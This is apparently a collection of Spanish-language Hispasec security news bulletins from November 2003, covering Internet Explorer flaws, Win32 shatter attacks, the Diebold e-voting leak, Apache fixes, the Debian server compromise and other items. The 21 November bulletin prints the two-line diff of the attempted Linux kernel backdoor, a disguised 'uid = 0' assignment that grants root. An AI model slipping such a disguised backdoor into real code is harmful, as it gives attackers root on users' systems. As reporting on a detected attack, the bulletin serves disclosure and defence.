domingo, 30 de noviembre de 2003

Múltiples vulnerabilidades en Microsoft Internet Explorer

Se han descubierto múltiples vulnerabilidades en Internet Explorer que
usadas de forma combinada pueden ser explotadas para comprometer el
sistema de un usuario.

1) La característica de redirección utilizando la cabecera "mhtml:"
del URI puede ser explotada para esquivar una comprobación de
seguridad en el Internet Explorer que normalmente evita que las
páginas web en la zona "Internet" interprete archivos locales.

2) La característica anteriormente mencionada también puede ser
explotada para ejecutar un archivo malicioso en el sistema del
usuario. La explotación con éxito requiere que se pueda ejecutar
código script en la zona "MyComputer".

3) Una vulnerabilidad de cross-site scripting puede ser utilizada para
ejecutar código en la zona de seguridad asociada con otra página si
ésta contiene un subframe. Esto podría permitir la ejecución de código
arbitrario en la zona "MyComputer".

4) Una variante de una vulnerabilidad "corregida" puede ser explotada
para secuestrar los cliks de usuario y realizar ciertas acciones sin
el conocimiento de este.

5) Un error en la funcionalidad de descarga puede ser explotada para
visualizar el directorio de cache del usuario utilizando una extensión
de fichero "htm" y un valor no válido en el campo de cabecera
"Content-Type". Esto no afecta a todas las versiones y puede haber
sido corregida en la última actualización del Internet Explorer.

Estas vulnerabilidades han sido confirmadas en Internet Explorer 6,
aunque otras versiones anteriores podría verse afectadas. La gravedad
del asunto aumenta ya que se tiene constancia de que hay códigos de
explotación circulando por la red.

Mientras Microsoft publica un parche de actualización que corrija
estos problemas, se recomienda desactivar el scripting de todos
lugares a los que se acceda excepto de los de confianza.


Julio Canto
jcanto@hispasec.com


Más información:

New "Clean" IE Remote Compromise
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Content.htm

MHTML Redirection leads to local file parsing in INTERNET zone
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile/MhtRedirParsesLocalFile-Content.htm

MHTML Redirection Leads to Downloading EXE and Executing
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Content.htm

BackToFramedJpu - a successor of BackToJpu attack
http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-Content.htm

HijackClickV2 - a successor of HijackClick attack
http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-Content.htm

Invalid ContentType may disclose cache directory
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Content.htm

Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-Content.htm

IE Remote Compromise by Getting Cache Location
http://www.safecenter.net/UMBRELLAWEBV4/execdror6

sábado, 29 de noviembre de 2003

Algunos problemas de Windows, sin posible solución

Una aplicación que se ejecuta en Windows básicamente lo que hace es
procesar los mensajes que va recibiendo. Cualquier programa tiene la
capacidad de enviar mensajes a otros programas y no existe ningún
sistema de autenticación, lo que abre la posibilidad a un nuevo mundo
de vulnerabilidades de seguridad.

"Exploiting design flaws in the Win32 API for privilege escalation -
or Shatter Attacks - How to break Windows" es un artículo que presenta
un nuevo método para atacar los sistemas basados en Win32 (y con la
posibilidad que otros entornos basados en el proceso de mensajes se
ven igualmente afectados). Lo más importante de esta vulnerabilidad es
que no tiene una solución fácil. Al menos no mediante la aplicación de
un simple parche, ya que se trata de un problema en el propio diseño
del entorno.

Es posible que los lectores recuerden que hace unos meses, en pleno
proceso antimonopolio, un vicepresidente de Microsoft indicó que no
era posible publicar el código fuente de Windows ya que esto pondría
al descubierto la existencia de algunos problemas de seguridad,
especialmente en la gestión de mensajes por parte del núcleo. De ser
identificados estos problemas, argumentaba, se pondría la seguridad
nacional (de los EE.UU.) en compromiso.

Si bien las declaraciones de este vicepresidente fueron rápidamente
desmentidas, el autor del artículo al que hacemos referencia, empezó a
investigar como funciona la gestión de mensajes en los sistemas
operativos Windows.

La estructura de un programa Windows se puede simplificar, muy
superficialmente, de la siguiente forma: el programa está
constantemente recibiendo mensajes que son enviados por el núcleo y
los otros programas en ejecución. Su misión consiste en procesar todos
aquellos para los que el programador ha incluido alguna acción. Por
ejemplo, cada vez que se pulsa una tecla, Windows envía el mensaje
WM_KEYDOWN a la aplicación que está en primer plano. Todos los
mensajes generados se sitúan en una cola y son procesados de forma
secuencial por cada aplicación.

El problema de seguridad se encuentra en el hecho que Windows permite
a una aplicación en ejecución enviar un mensaje a cualquier ventana
abierta en el mismo ordenador (o escritorio, para ser más exactos),
con independencia de si la ventana receptora tiene alguna relación con
la aplicación que emite el mensaje o de sí el receptor de mensajes
desea recibir los mensajes que le son enviados. Adicionalmente,
Windows no facilita a las aplicaciones ningún mecanismo para
determinar la autenticación del emisor del mensaje.

Es justamente esta falta de funciones de autenticación la que puede
ser aprovechada en este tipo de ataques. Una aplicación maliciosa
puede enviar un mensaje a un programa que se está ejecutando con el
que puede manipular las ventanas y los procesos del programa receptor
del mensaje.

La buena noticia es que este tipo de ataques, hoy por hoy, sólo pueden
realizarse en local.


Xavier Caballé
xavi@hispasec.com


Más información:

Exploiting design flaws in the Win32 API for privilege escalation - or
Shatter Attacks - How to break Windows
http://www.zerosecurity.de/modules.php?op=modload&name=News&file=article&sid=4327

Alguns problemes de Windows, pels quals no hi ha (ni haurà) cap
solució
http://www.caballe.com/categories/seguretat/2003/10/19.html#a793

Respuesta de Microsoft: 'Esto no es un problema de seguridad'
http://security.tombom.co.uk/response.txt

viernes, 28 de noviembre de 2003

Dos tercios de las redes inalámbricas madrileñas desprotegidas ante ataques

Un estudio realizado recientemente por las multinacional informática HP
demuestra la carencia de seguridad en las redes inalámbricas madrileñas
en particular y españolas en general. Esta nueva tecnología que en
la actualidad está implantándose a marchas forzadas, está todavía lejos de
ofrecer una seguridad al menos aceptable. Los estándares para securizar
tienen lagunas importantes que los hacen prácticamente inútiles ante
ataques. Esto se agrava bastante cuando ni tan siquiera se usan estas
medidas.

El nuevo caballo de batalla en cuanto a seguridad en redes a medio plazo
serán las redes inalámbricas, ya que es un producto atractivo para la
empresa pero en la actualidad carente de la seguridad apropiada.

Al igual que actuaría un atacante, los investigadores de HP que han
realizado este estudio en la Comunidad de Madrid, realizaron un
recorrido por las calles con un vehículo, con la única compañía de un
ordenador portátil con tarjeta Wi-Fi, un software de detección de redes
y una antena omnidireccional. Con este método pudieron detectar cerca
de 7.500 ordenadores y sistemas conectados a 518 puntos de acceso
inalámbrico, constatando que cerca del diez por ciento eran de
grandes empresas.

El consultor de Seguridad de HP Consulting, Félix Martín, comentaba "Los resultados del estudio no suponen una sorpresa, sino que confirman que las empresas presentan un gran desconocimiento en seguridad inalámbrica", afirmó "Creemos que no se conocen bien los riesgos de un punto de acceso mal configurado y sin seguridad".

Igualmente HP propone algunas medidas que vendrían en un principio a
intentar evitar esta falta de seguridad, y entre ellas estaría la
utilización de un nuevo protocolo, el WPA (WiFi Protected Access) que
se encargaría del cifrado en el punto de acceso con el fin de evitar
algunas de las carencias de seguridad que en estos momentos tiene el
protocolo WEP (Wired Equivalent Protocol).


Antonio Román
roman@hispasec.com


Más información:

Dos de cada tres redes inalámbricas madrileñas carecen de seguridad
http://www.elmundo.es/navegante/2003/11/28/seguridad/1070025605.html

Dos de cada tres redes inalámbricas carecen de seguridad
http://www.elsemanaldigital.com/articulos.asp?idarticulo=10496

Dos tercios de las redes inalámbricas madrileñas carecen de mínimos de
protección
http://www.madridpress.com/home/DetallNews.jsp?id=19150&static=0

La seguridad en las redes inalámbricas a análisis
http://www.redestelecom.com/Actualidad/Noticias/Infraestructuras/Soluciones/20031128053

jueves, 27 de noviembre de 2003

Nuevos contenidos en CriptoRed (noviembre 2003)

Breve resumen de los últimos contenidos incorporados durante el mes de
noviembre de 2003 en CriptoRed, la Red Temática Iberoamericana de
Criptografía y Seguridad de la Información.

Nuevas descargas de documentos por orden alfabético:

- Auditoría de Routers y Switches
http://www.criptored.upm.es/paginas/docencia.htm#gtletraA

- Control, Administración e Integridad de Logs
http://www.criptored.upm.es/paginas/docencia.htm#gtletraC

- Criptografía de Curvas Elípticas (Conferencia CIBSI '03)
http://www.criptored.upm.es/paginas/docencia.htm#gtletraC

- Cuaderno de Exámenes Resueltos de Criptografía
http://www.criptored.upm.es/paginas/docencia.htm#examenes

- Demostraciones 'discretas' para su uso en comercio electrónico
(Conferencia CIBSI '03)
http://www.criptored.upm.es/paginas/docencia.htm#gtletraD

- Detección de Intrusos con Redes Neuronales (Conferencia CIBSI '03)
http://www.criptored.upm.es/paginas/docencia.htm#gtletraD

- Diseño Criptográfico de los Protocolos IPsec e IKE (Conferencia
CIBSI '03)
http://www.criptored.upm.es/paginas/docencia.htm#gtletraD

- Issues, non-issues, and cryptographic tools for Internet-based voting
http://www.criptored.upm.es/paginas/docencia.htm#gtletraI

- La Enseñanza de la Seguridad Informática en España y su Proyección
en Latinoamérica
http://www.criptored.upm.es/paginas/docencia.htm#gtletraL

- Proyecto CriptoRed y el Desarrollo de la Seguridad Informática en
Iberoamérica
http://www.criptored.upm.es/paginas/docencia.htm#gtletraP

- Riesgos Cibernéticos
http://www.criptored.upm.es/paginas/docencia.htm#gtletraR


Congresos y seminarios con fechas vigentes por orden cronológico:

- Special Session on Architectures and Languages for Digital Rights
Management and Access Control (USA)
- Second Wokshop on Security in Information Systems (Portugal)
- VII Seminario Iberoamericano de Seguridad en Tecnologías de la
Información (Cuba)
- Workshop sobre Internet Communications Security (Italia)
- Congreso Applied Cryptography and Network Security (China)
- IV Jornada Nacional de Seguridad Informática (Colombia)
- IFIP Working Conference on Data and Applications Security (España)

http://www.criptored.upm.es/paginas/eventos.htm#Congresos


Cursos de especialidad y postgrado:

- Máster en Tecnologías de Seguridad Informática (España)
- Máster Tecnologías Información y Seguridad (España)
- Especialización en Criptografía y Seguridad Teleinformática (Argentina)
- Diplomado en Seguridad Computacional (Chile)
- Diplomado en Seguridad Informática (México)
- Curso de Postgrado Criptosistema RSA (España)
- Curso Avanzado de Criptología Contemporánea (España)
- Cursos ISI de Seguridad Informática (España)
- Cursos CYBSEC (Argentina - Ecuador)
- Talleres de Seguridad Informática (México)

http://www.criptored.upm.es/paginas/eventos.htm#Cursos


Noticias seleccionadas del mes:

- Primer Diplomado en Seguridad Computacional en la Universidad de Chile
(Chile)
http://www.clcert.cl/capacita/dipl2004/resumen.html

- Curso de Postgrado Criptosistema RSA en CSIC (España)
http://www.csic.es/postgrado/cursos.html

- CFP Congreso Applied Cryptography and Network Security (China)
http://www.rsasecurity.com/rsalabs/staff/bios/mjakobsson/ACNS%202004%20Call%20For%20Papers.htm

- CFP IFIP Working Conference on Data and Applications Security (España)
http://seclab.dti.unimi.it/~ifip113/2004/

- CFP Workshop sobre Internet Communications Security (Italia)
http://163.117.149.66/iccsa04/

- 5ª Edición de DISC Día Internacional de Seguridad en Cómputo (Colombia)
http://www.utp.edu.co/disc/

- LSD, Laboratório de Segurança de Dados en la USP (Brasil)
http://www.ime.usp.br/~isc2002/

- Celebrado Primer Flash Mod sobre Digital Forensics (España)
http://cp4df.sourceforge.net/fmsdf.htm

- CriptoRed en Catalogador de Recursos de Investigación de Universia
http://www1.universia.net/CatalogaXXI/pub/secciones.asp?IDC=10047&IDP=ES&IDI=1&IDSEC=12316&IDSECP=11688





miércoles, 26 de noviembre de 2003

Fallos en un software de voto electrónico ponen en duda las victorias republicanas en EEUU

La Electronic Frontier Foundation y la mayoría de universidades de los
Estados Unidos se han unido para denunciar las prácticas fraudulentas
de una importante empresa de votación electrónica, Diebold Elections
Systems. Un hacker entró en el sistema de la compañía y copió 15.000
documentos confidenciales, que puso a disposición del público. En
ellos se demuestra que el "software" de Diebold, usado en las
elecciones que dieron la victoria a Bush y Schwazeneger, tenía
agujeros que permitían cambiar los votos.

En marzo, alguien se introdujo en los servidores de la compañía
norteamericana de sistemas de votación electrónica, Diebold Elections
Systems, y copió 1,8 gigabits de datos, la mayoría correo electrónico
desde 1999 y documentos internos. Diebold suministra máquinas de
votación electrónica a 37 estados y tiene repartidas más de 50.000
terminales por el país. Los documentos demostraban que la empresa
conocía los graves errores de seguridad en sus programas, que podían
provocar fraude, como la posibilidad de cambiar votos sin dejar rastro
o la instalación de programas no certificados por las autoridades
electorales.

En agosto, el hacker envió los documentos a diversos activistas, que
los publicaron en sus "weblogs". Pronto, otras webs replicaron el
contenido, la mayoría en universidades estadounidenses, desde Hardvard
hasta el Bronx, pero también Australia, Canadá o Italia. Diebold les
mandó avisos legales para que retirasen los documentos, amparándose en
la ley de derechos de autor Digital Millenium Copyright Act (DMCA).
Capitaneados por el grupo de estudiantes "Why War?", del Swarthmore
College de Pennsylvania, los activistas iniciaron entonces una campaña
de desobediencia civil electrónica, negándose a retirar el material.

Según los estudiantes, "no podemos permitir la supresión de evidencias
que prueban que una máquina Diebold registró 16.022 votos negativos
para Al Gore en Florida, durante las elecciones presidenciales del
2000. Tampoco que el CEO de esta compañía ha dado 9.965 dólares a Bush
y el partido republicano desde el 2001. Ni que Diebold se esté
preparando para contar los votos de las presidenciales del próximo
año. Están usando la ley del "copyright" para suprimir una información
que necesita ser hecha pública".

Diebold envió también un aviso legal al proveedor Online Policy Group,
para que uno de sus usuarios, el San Francisco Indymedia, retirase
enlaces hacia los documentos. Este ISP, sin ánimo de lucro, está
ligado a la Electronic Frontier Foundation (EFF), que salió en su
defensa. La EFF y la Stanford Law School han pedido una orden judicial
para que Diebold deje de enviar amenazas. Según los abogados de la
EFF, "las exigencias abusivas del "copyright" no pueden silenciar el
debate público sobre la seguridad del voto electrónico. Estos
documentos son del dominio público, por su importancia en este debate.
Además, defendemos el derecho de los usuarios a enlazar con
información que es crítica".

Diebold ha hecho pocas declaraciones sobre el tema: que sus amenazas
no significan que los documentos sean auténticos y que algunos pueden
haber sido alterados, después de robados. Un ex-trabajador de la
compañía ha desvelado, por su parte, que Diebold instaló, el año
pasado, tres programas no certificados en 22.000 máquinas, vendidas al
estado de Georgia por 56 millones.

Las consecuencias no se han hecho esperar: Marc Carrel, de la
secretaría de estado de California, ha anunciado que retrasará la
certificación de los productos de Diebold para las elecciones de 2004,
hasta que no se haga una investigación. Según Carrel, Diebold instaló
programas sin certificar en 4.000 máquinas de voto electrónico del
condado de Alameda, usadas en las elecciones que dieron la victoria a
Arnold Schwazeneger. Otro condado californiano, San Diego, se
encuentra en estos momentos negociando la compra de 10.000 máquinas
Diebold.

En Maryland, los demócratas han pedido una auditoría independiente a
las máquinas Diebold que su estado acaba de comprar. Los demócratas no
se fían de los informes de la auditora Science Application
International Corp (SAIC): en julio, un estudio de dos universidades
avisaba a las autoridades de Maryland de serias debilidades en el
sistema de voto de Diebold. Se pidieron explicaciones a SAIC, quien
replicó que los científicos no entendían el sistema. En Europa, se ha
creado una plataforma para exigir la fiabilidad del voto electrónico.


Mercè Molist
merce@grn.es


Más información:

Why war?
http://why-war.com/features/2003/10/diebold.html

Diebold Met with 'Electronic Civil Disobedience'
http://www.kuro5hin.org/story/2003/10/21/2367/2543

E-voting vendor sued for DMCA takedown
http://www.theregister.co.uk/content/6/33750.html

ISP Rejects Diebold Copyright Claims Against News Website
http://www.eff.org/Legal/ISP_liability/20031016_eff_pr.php

Electronic Frontier Foundation and Stanford Law Clinic Sue Electronic
Voting Company
http://www.eff.org/Legal/ISP_liability/OPG_v_Diebold/20031103_eff_pr.php

Maryland Legislators Question Voting Machine Report
http://www.epic.org/alert/EPIC_Alert_10.22.html

Suspect Code Used in State Votes
http://www.wired.com/news/evote/0,2645,61092,00.html?tw=wn_tophead_2

Resolution on voter verifiable e-voting
http://www.free-project.org/resolution

martes, 25 de noviembre de 2003

Se publican nuevas versiones del servidor Apache

La fundación Apache ha publicado recientemente actualizaciones de su
servidor Apache, tanto en la rama 2.0.* como en la 1.3.*.

Apache es el servidor web más popular del mundo, disponible en código
fuente y para infinidad de plataformas, incluyendo UNIX, Microsoft
Windows, OS/2 y Novell NetWare. En Octubre de 2003, Apache constituía
más del 66% de los servidores web de Internet.

Las versiones no actualizadas de Apache contienen las siguientes
vulnerabilidades:

* Un atacante puede ocasionar la caída del servidor Apache y, bajo
ciertas circunstancias, la ejecución de código arbitrario con sus
privilegios. Para que el ataque sea factible, el fichero de
configuración Apache debe contener expresiones regulares con más de
nueve "capturas". El problema reside en varios desbordamientos de búfer
en los módulos "mod_alias" y "mod_rewrite". Esta vulnerabilidad afecta a
las versiones de Apache previas a 1.3.29 y 2.0.48.

* Bajo ciertas circunstancias, es posible que Apache envíe los datos de
un proceso CGI a un cliente equivocado. Esta vulnerabilidad afecta a las
versiones de Apache previas a la 2.0.48.

La recomendación de Hispasec Sistemas es actualizar sus instalaciones
Apache a 1.3.29 o 2.0.48. Aparte de las vulnerabilidades citadas, las
nuevas versiones de Apache solucionan numerosos "bugs" menores.


Jesús Cea Avión
jcea@hispasec.com


Más información:

Apache HTTP Server 1.3.29 Released
http://apache.slashdot.org/article.pl?sid=03/10/29/0720209

Changes with Apache 1.3.29
http://www.apache.org/dist/httpd/CHANGES_1.3

Apache 2.0.48 Released
http://apache.slashdot.org/article.pl?sid=03/11/01/2225252

Apache HTTP Server 2.0.48 Released
http://www.apache.org/dist/httpd/Announcement2.html

Apache
http://httpd.apache.org/

Multiple stack-based buffer overflows in (1) mod_alias and (2)
mod_rewrite for Apache before 1.3.29 allow attackers to can create
configuration files to cause a denial of service (crash) or execute
arbitrary code via a regular expression with more than 9 captures.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0542

mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not
properly handle CGI redirect paths, which could cause Apache to send the
output of a CGI program to the wrong client.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0789

lunes, 24 de noviembre de 2003

Versión en castellano de la metodología OSSTMM v2.1 y metodología para el análisis de redes inalámbricas

La organización ISECOM, el Instituto para la Seguridad y las
Metodologías Abiertas, acaba de publicar la versión en castellano de
la metodología abierta para la verificación de la seguridad, la
OSSTMM. Por otra parte, también se ha publicado una sección especial
de esta metodología especializada para el análisis de redes
inalámbricas.

El "Manual de la Metodología Abierta de Testeo (sic) de Seguridad" es
un documento que reúne, de forma estandarizada y ordenada, las
diversas verificaciones y pruebas que debe realizar un profesional de
la seguridad informática durante el desarrollo de las auditorías y
verificaciones de la seguridad. Es un documento en constante
evolución, fruto del trabajo conjunto de más de 150 colaboradores de
todo el mundo.

La participación directa de estos profesionales, que desarrollan su
actividad profesional en el sector de la seguridad, en la confección
de la metodología le permite incorporar los más recientes cambios y
nuevas tendencias en el mundo de la seguridad informática.

Para aquellos lectores de "una-al-día" que deseen más detalles acerca
de las características de esta metodología, recomendamos la lectura de
los boletines previos cuya referencia indicamos en el apartado de "Más
información".


Metodología para análisis de redes inalámbricas

Por otra parte, ISECOM también ha publicado recientemente una versión
especial de la metodología OSSTMM para el análisis de las redes
inalámbricas (802.11, Bluetooh, infrarrojos y similares).

En esta versión especial de la metodología se incluyen las diversas
pruebas y verificaciones que están especialmente diseñadas para la
comprobación del nivel de seguridad de las comunicaciones inalámbricas
y los dispositivos que utilizan este tipo de comunicaciones. Estas
verificaciones incluyen tanto la identificación de estas
comunicaciones como la comprobación del nivel de seguridad de las
redes ya identificadas.


Xavier Caballé
xavi@hispasec.com


Más información:

OSSTMM - Manual de la Metodología Abierta de Testeo de Seguridad
http://www.isecom.info/mirror/OSSTMM.es.2.1.pdf

OSSTMM Wireless 2.9.1 - Wireless Security Testing Section Open-Source
Security Testing Methodology Manual
http://www.isecom.info/mirror/osstmm.en.2.9.wireless.pdf

OSSTMM - Open Source Security Testing Methodology Manual by Pete
Herzog
http://www.osstmm.org

Una-al-día (21-09-03): Versión 2.1 de la metodología OSSTMM para
verificación de la seguridad
http://www.hispasec.com/unaaldia/1792

Una-al-día (27-02-02): Versión 2.0 de la metodología OSSTMM para
verificación de la seguridad
http://www.hispasec.com/unaaldia/1221

domingo, 23 de noviembre de 2003

Las medidas de seguridad en la red corporativa de Microsoft

Microsoft ha publicado un documento donde explica las medidas de
seguridad informática que utiliza para la protección de su red
corporativa, actualmente compuesta por unos 300.000 ordenadores
repartidos en cualquier parte del mundo (400 oficinas) y unos 4.200
servidores.

El documento, de 29 páginas y con el título "Security at Microsoft",
explica los métodos y tecnologías que se utilizan para la protección
de la red corporativa por parte del OTG, el Operations and Technology
Group que es la división de Microsoft responsable de la seguridad de
la red corporativa. Algunos datos de interés son que Microsoft afirma
recibir unos 100.000 intentos de intrusión cada mes y que, también
mensualmente, se detectan unos 125.000 mensajes infectados con virus
informáticos. También se explica como Microsoft entiende la gestión
del riesgo, que es un aspecto fundamental para la definición y
despliegue de las medidas de protección de seguridad.

A partir de este análisis de riesgos, se detallan los mecanismos
utilizados corporativamente por Microsoft, como son las tarjetas con
certificados digitales (SmartCard) que actualmente utilizan unos
65.000 empleados como sistema de autenticación para el acceso al
correo electrónico y a los sistemas informáticos de forma remota (a
través de VPN o puntos directos de acceso).

Microsoft también explica las medidas de seguridad aplicadas para la
protección del acceso en los cerca de 4.000 puntos de acceso sin hilos
y que son utilizados por unos 30.000 empleados.

Con respecto al correo electrónico y agenda, como es de esperar,
Microsoft se basa en la utilización de OWA (Outlook Web Access) y OMA
(Outlook Mobile Access) en sistemas que son accesibles tanto desde la
red corporativa como desde Internet. Estos servicios disponen de una
serie de medidas de protección periféricas, basadas en la utilización
de ISA (Internet Security and Acceleration Server) versión 2000,
Feature Pack 1.

La detección de virus en el correo se hace a través de programas
antivirus en todos los puntos de la red: ordenadores personales,
servidores, pasarelas de correo, pasarelas para el acceso a Internet y
ordenadores de bolsillo (PDA). El antivirus utilizado en los
ordenadores personales y servidores es eTrust de CA, mientras que en
los servidores de correo y pasarelas de acceso a Internet se utiliza
TrendMicro y Birghtmail. El volumen de correo analizado a diario es de
unos cinco millones, eliminando una media de 800 virus diarios y unos
2,4 millones de mensajes de SPAM filtrados a diario.

Por último, se explica también los mecanismos de protección ante las
redes de empresas asociadas, así como las medidas de seguridad
internas (política de contraseñas, compartición de volúmenes, acceso
interactivo a los servidores; segmentación de la red aplicando el
cifrado del tráfico con IPSec). También se indican las medidas
existentes para la monitorización de la red, la gestión de
vulnerabilidades y de aplicación de parches.

El documento, en definitiva, es una visión a alto nivel de como
Microsoft aplica en su propia casa las medidas de seguridad y puede
ser útil para conocer como aplicar las políticas de protección a las
grandes y complejas redes informáticas distribuidas por múltiples
localizaciones. Por lo tanto, su lectura es recomendable e
interesante.


Xavier Caballé
xavi@hispasec.com


Más información:

Security At Microsoft
http://www.microsoft.com/technet/itsolutions/msit/security/mssecbp.asp
http://go.microsoft.com/fwlink/?LinkId=21314

Developers: Microsoft Security Whitepaper
http://slashdot.org/article.pl?sid=03/11/22/2154202

For security ask yourself... what would Microsoft do?
http://www.nwfusion.com/news/2003/1121forsecur2.html

Les mesures de seguretat a la xarxa corporativa de Microsoft
http://www.quands.info/blog/2003/11/23.html#1070

sábado, 22 de noviembre de 2003

Varias máquinas del Proyecto Debian comprometidas

Ayer conocíamos que al menos cuatro máquinas pertenecientes al
proyecto Debian habían sido comprometidas, aunque se insistía en que
las fuentes del archivo principal no habían sufrido ningún incidente.

Debian es una de las distribuciones libres más importantes del sistema
operativo GNU/Linux, el cual hace uso de las herramientas aportadas
por el proyecto GNU y el núcleo Linux. Este se distribuye bien ya
precompilado (listo para instalar) o bien en código fuente. Todo ello
a través de sus servidores y múltiples mirrors (servidores de
replicas) alrededor de todo el mundo.

El pasado viernes se alertó de un ataque que había afectado a cuatro
servidores los cuales habían sido inmediatamente puestos fuera de
servicio para un análisis en profundidad. Fuentes del proyecto han
anunciado que pondrán en conocimiento los detalles del incidente
durante la próxima semana.

Los servidores comprometidos son los siguientes:
- master (Sistema de seguimiento de fallos)
- murphy (Listas de correo)
- gluck (Web, CVS)
- klecker (Seguridad, No-us, Busqueda web, Maestro www)

Algunos servicios fundamentales, como el www, han sido transferidos a
otras máquinas, el resto será puesto en servicio tan pronto como se
verifique su fiabilidad.

El anuncio de la versión 3.0r2 (que se iba a ser presentada esta misma
semana) ha tenido que ser pospuesto, a pesar de no haber sido
comprometido, hasta que sea restablecida la normalidad.

Durante el presente año estamos asistiendo distintos ataques dirigidos
a los proyectos Open Source, véase el caso del compromiso a los
servidores GNU a mediados de este año, o el mas reciente intento de
troyanizar el kernel Linux. Desde el punto de vista del cracker esta
comunidad es un pastel muy goloso y la posibilidad de alterar para su
interés alguno de los paquetes fundamentales del sistema operativo le
abriría las puertas a un numero indeterminado de equipos. No es de
extrañar entonces, la sucesión de este tipo de ataques. Una de las
bondades de las distribuciones GNU/Linux es el uso generalizado de
tecnologías criptográficas con las que los autores y usuarios pueden
verificar que los distintos paquetes no han sufrido alteraciones
durante el proceso de distribución.


Francisco Javier Santos
fsantos@hispasec.com


Más información:

Some Debian Project machines have been compromised (Anuncio Original)
http://cert.uni-stuttgart.de/files/fw/debian-security-20031121.txt

Debian: Attack Didn't Harm Source Code
http://www.eweek.com/article2/0,4149,1394420,00.asp

Debian Project Servers Compromised
http://slashdot.org/articles/03/11/21/1314238.shtml?tid=126&tid=172&tid=185&tid=90

Intento de instalar una puerta trasera en el kernel Linux
http://www.hispasec.com/unaaldia/1853

Compromiso de seguridad en el servidor FTP del proyecto GNU
http://www.hispasec.com/unaaldia/1755

viernes, 21 de noviembre de 2003

Intento de instalar una puerta trasera en el kernel Linux

Un análisis rutinario automático del código fuente de la última versión
del kernel Linux (2.6-test) descubre el intento de implantar una puerta
trasera en dicho sistema operativo.

Linux es un sistema operativo Open Source en boga, cuya popularidad
crece día a día.

La última versión del kernel Linux (2.6 test), aún en desarrollo,
experimentó un intento de implantarle una puerta trasera, que permitiría
a un atacante local obtener privilegios de administrador o "root" con
la ejecución de una función aparentemente inocua y de uso normal.

El fichero alterado fue "kernel/exit.c", y constaba de apenas dos líneas
de código fuente:


--- GOOD 2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;



La puerta trasera, muy inteligente, explota el hecho de que el lenguaje
de programación C permite asignaciones en lugares insospechados, como
dentro de una sentencia "if". El efecto neto de este cambio sería
obtener privilegios de administrador o "root" si se invoca la función
"sys_wait4()" con los parámetros apropiados ("__WCLONE" y "__WALL"). A
la vista del cambio, el atacante ha mostrado cierta destreza para lograr
que el código no sea patentemente malicioso.

El cambio se realizó en la réplica CVS que reside en el servidor
"kernel.bkbits.net". Dicha réplica se obtiene automáticamente a través
de los fuentes oficiales de Linux, gestionados mediante la herramienta
"BitKeeper". La alteración afectó a la réplica, no a los fuentes
originales.

Aunque el cambio fue detectado de forma automática por la
herramientas de exportación BitKeeper->CVS, el incidente servirá como
llamada de atención y para desplegar nuevas tecnologías, como el
requerir una firma digital autorizada para poder realizar cambios en el
kernel. Dado que la exportación BitKeeper->CVS se realiza de forma
diaria, el fichero alterado se detectó y eliminó en menos de 24 horas.

Para los usuarios de entornos Linux, el mejor consejo que se puede dar
es descargar las actualizaciones desde fuentes de confianza y verificar,
si existen, sus firmas digitales.


Jesús Cea Avión
jcea@hispasec.com


Más información:

Linux: Kernel "Back Door" Attempt
http://kerneltrap.org/node/view/1584

Intentan 'colar' una puerta trasera en el núcleo Linux
http://barrapunto.com/article.pl?sid=03/11/06/1515210

Linux Kernel Back-Door Hack Attempt Discovered
http://slashdot.org/articles/03/11/06/058249.shtml

BK2CVS problem
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0621.html

Re: BK2CVS problem
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0635.html

Re: BK2CVS problem
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0699.html

jueves, 20 de noviembre de 2003

Visto bueno a la Agencia de Seguridad Europea en Redes e Información

Como ya informamos en "una al día" el pasado día 2 de marzo del
presente año, se constituyó la comisión encargada del estudio de la
Agencia de seguridad europea en redes e información de la que ahora
nace ENISA.

El pasado miércoles, día 19, los ministros de Telecomunicaciones de la
Unión Europea aprobaron la creación de lo que será la futura Agencia de
Seguridad europea en redes e información, ENISA. El único país que se
abstuvo fue el representante del Reino Unido, por reticencias jurídicas.
Esta nueva agencia intenta dar respuesta al creciente número de incidentes
relacionados con la seguridad informática en el ámbito europeo en
particular y en el mundial en general.

Con esta idea se intenta dar un fuerte empuje a la economía digital,
unificar criterios y trazar unas líneas de actuación ante incidentes de
seguridad, con objeto de evitar la diferencia de trato entre países de
la Unión Europea ante los delitos informáticos.

El organigrama organizativo de la futura agencia que empezará a
funcionar el próximo mes de enero, tendrá un representante de cada uno
de los estados miembros de la UE a lo que se añadirán tres más
designados por la Comisión y otros tres procedentes de diversos grupos
de sectores implicados. Se espera que su sede se ubique provisionalmente
en Bruselas, aunque varios países pugnan por obtener la sede definitiva,
entre ellos España.

Los objetivos perseguidos son:

* Obtener un consenso en materia de seguridad informática en Europa
que permita mantener la disponibilidad y seguridad necesarias en
las redes y sistemas de información.
* Proveer asistencia para la aplicación de nuevas normativas en este
campo.
* Dirigir el desarrollo en estas materias.
* Avisar y coordinar acerca de la información recopilada y analizada.
* Dar soporte a la certificación y estandarización del mercado.
* Facilitar el contacto con terceros países.


Antonio Román
roman@hispasec.com


Más información:

Los ministros de la UE crean la Agencia Europea para la Seguridad de
Redes
http://www.el-mundo.es/navegante/2003/11/20/esociedad/1069328001.html

Los Quince crean una agencia para la seguridad de redes
http://elmundodinero.elmundo.es/mundodinero/2003/11/20/Noti20031120125455.html

La agencia europea de seguridad de redes informáticas comenzará a
funcionar en enero
http://www.libertaddigital.com/noticias/noticia_1276207676.html

